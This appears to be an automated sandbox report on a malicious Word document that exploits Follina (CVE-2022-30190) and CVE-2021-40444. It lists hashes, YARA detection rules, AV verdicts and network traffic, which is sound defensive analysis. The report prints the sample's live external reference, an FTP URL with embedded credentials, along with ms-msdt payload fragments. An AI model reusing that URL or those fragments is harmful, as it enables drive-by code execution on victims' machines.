Edit tour

Windows Analysis Report
v4nkfHg4d9.doc

Overview

General Information

Sample Name:	v4nkfHg4d9.doc
Analysis ID:	706117
MD5:	cbc307d6059925e9abbdbdec4d9ec0c1
SHA1:	8f0fc563f43cc1422b523a21f01858e031761e5f
SHA256:	8d61ea9ef38b6e7b36f466299223ad43339080d3a9914059c88ca3dd6be5cd32
Tags:	doc
Infos:

Detection

CVE-2021-40444, Follina CVE-2022-30190

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected Microsoft Office Exploit Follina CVE-2022-30190

Detected CVE-2021-40444 exploit

Multi AV Scanner detection for domain / URL

Antivirus detection for dropped file

Contains an external reference to another file

Yara signature match

Potential document exploit detected (unknown TCP traffic)

Detected TCP or UDP traffic on non-standard ports

Internet Provider seen in connection with other malware

Uses FTP

Potential document exploit detected (performs DNS queries)

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 1480 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
document.xml.rels	SUSP_Doc_WordXMLRels_May22	Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation	Tobias Michalski, Christian Burkard, Wojciech Cieslak	0x39:$a1: <Relationships 0x419:$a2: TargetMode="External" 0x3d1:$x1: .html!

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	SUSP_Encoded_Discord_Attachment_Oct21_1	Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x2cd6:$enc_b01: Y2RuLmRpc2NvcmRhcHAuY29tL2F0dGFjaG1lbnRz 0x5dfd:$enc_b01: Y2RuLmRpc2NvcmRhcHAuY29tL2F0dGFjaG1lbnRz
dump.pcap	SUSP_PS1_Msdt_Execution_May22	Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation	Nasreddine Bencherchali, Christian Burkard	0x2ba0:$a: PCWDiagnostic 0x5cc7:$a: PCWDiagnostic 0x2b94:$sa3: ms-msdt 0x5cbb:$sa3: ms-msdt 0x2bf4:$sb3: IT_BrowseForFile= 0x5d1b:$sb3: IT_BrowseForFile=
dump.pcap	EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22	Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation	Tobias Michalski, Christian Burkard	0x2b83:$re1: location.href = "ms-msdt: 0x5caa:$re1: location.href = "ms-msdt:
dump.pcap	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html	SUSP_Encoded_Discord_Attachment_Oct21_1	Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x1957:$enc_b01: Y2RuLmRpc2NvcmRhcHAuY29tL2F0dGFjaG1lbnRz
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html	SUSP_PS1_Msdt_Execution_May22	Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation	Nasreddine Bencherchali, Christian Burkard	0x1821:$a: PCWDiagnostic 0x1815:$sa3: ms-msdt 0x1875:$sb3: IT_BrowseForFile=
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html	EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22	Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation	Tobias Michalski, Christian Burkard	0x1804:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html	SUSP_Encoded_Discord_Attachment_Oct21_1	Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x1957:$enc_b01: Y2RuLmRpc2NvcmRhcHAuY29tL2F0dGFjaG1lbnRz
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html	SUSP_PS1_Msdt_Execution_May22	Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation	Nasreddine Bencherchali, Christian Burkard	0x1821:$a: PCWDiagnostic 0x1815:$sa3: ms-msdt 0x1875:$sb3: IT_BrowseForFile=
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html	EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22	Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation	Tobias Michalski, Christian Burkard	0x1804:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16ADE517.html	SUSP_Encoded_Discord_Attachment_Oct21_1	Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x1957:$enc_b01: Y2RuLmRpc2NvcmRhcHAuY29tL2F0dGFjaG1lbnRz
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16ADE517.html	SUSP_PS1_Msdt_Execution_May22	Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation	Nasreddine Bencherchali, Christian Burkard	0x1821:$a: PCWDiagnostic 0x1815:$sa3: ms-msdt 0x1875:$sb3: IT_BrowseForFile=
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16ADE517.html	EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22	Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation	Tobias Michalski, Christian Burkard	0x1804:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16ADE517.html	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF5ACC2C.html	SUSP_Encoded_Discord_Attachment_Oct21_1	Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x1957:$enc_b01: Y2RuLmRpc2NvcmRhcHAuY29tL2F0dGFjaG1lbnRz
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF5ACC2C.html	SUSP_PS1_Msdt_Execution_May22	Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation	Nasreddine Bencherchali, Christian Burkard	0x1821:$a: PCWDiagnostic 0x1815:$sa3: ms-msdt 0x1875:$sb3: IT_BrowseForFile=
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF5ACC2C.html	EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22	Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation	Tobias Michalski, Christian Burkard	0x1804:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF5ACC2C.html	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
Click to see the 11 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: v4nkfHg4d9.doc

Avira: detected

Multi AV Scanner detection for submitted file

Source: v4nkfHg4d9.doc	ReversingLabs: Detection: 24%
Source: v4nkfHg4d9.doc	Virustotal: Detection: 37%			Perma Link

Multi AV Scanner detection for domain / URL

Source: ftpupload.net

Virustotal: Detection: 7%

Perma Link

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF5ACC2C.html	Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html	Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16ADE517.html	Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html	Avira: detection malicious, Label: JS/CVE-2022-30190.G

Exploits

Yara detected Microsoft Office Exploit Follina CVE-2022-30190

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16ADE517.html, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF5ACC2C.html, type: DROPPED

Detected CVE-2021-40444 exploit

Source: document.xml.rels

Extracted files from sample: mhtml:ftp://epiz_32594997:fkmeetiwdg@ftpupload.net/htdocs/a.html!x-usc:ftp://epiz_32594997:fkmeetiwdg@ftpupload.net/htdocs/a.html

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657
Source: global traffic	TCP traffic: 185.27.134.11:18657 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 185.27.134.11:18657 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:18657 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657
Source: global traffic	TCP traffic: 185.27.134.11:18657 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 185.27.134.11:18657 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:18657 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657
Source: global traffic	TCP traffic: 185.27.134.11:18657 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657
Source: global traffic	TCP traffic: 185.27.134.11:18657 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:18657 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 185.27.134.11:30008
Source: global traffic	TCP traffic: 185.27.134.11:30008 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 185.27.134.11:30008
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 185.27.134.11:30008 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 185.27.134.11:30008 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:30008 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 185.27.134.11:30008
Source: global traffic	TCP traffic: 185.27.134.11:30008 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 185.27.134.11:30008
Source: global traffic	TCP traffic: 185.27.134.11:30008 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 185.27.134.11:30008 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 185.27.134.11:30008 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 185.27.134.11:30008
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 185.27.134.11:30008
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 185.27.134.11:30008
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:30008 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21

Source: global traffic

DNS query: name: ftpupload.net

Source: global traffic

TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657

Source: Joe Sandbox View

ASN Name: WILDCARD-ASWildcardUKLimitedGB WILDCARD-ASWildcardUKLimitedGB

Source: unknown

FTP traffic detected: 185.27.134.11:21 -> 192.168.2.22:49179 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 380 of 6900 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 380 of 6900 allowed.220-Local time is now 05:31. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 380 of 6900 allowed.220-Local time is now 05:31. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 380 of 6900 allowed.220-Local time is now 05:31. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 60 seconds of inactivity.

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{401971E5-55A6-4DE4-A031-DD1C92F91BDD}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: ftpupload.net

Source: dump.pcap, type: PCAP	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: dump.pcap, type: PCAP	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: dump.pcap, type: PCAP	Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: document.xml.rels, type: SAMPLE	Matched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, type: DROPPED	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, type: DROPPED	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, type: DROPPED	Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, type: DROPPED	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, type: DROPPED	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, type: DROPPED	Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
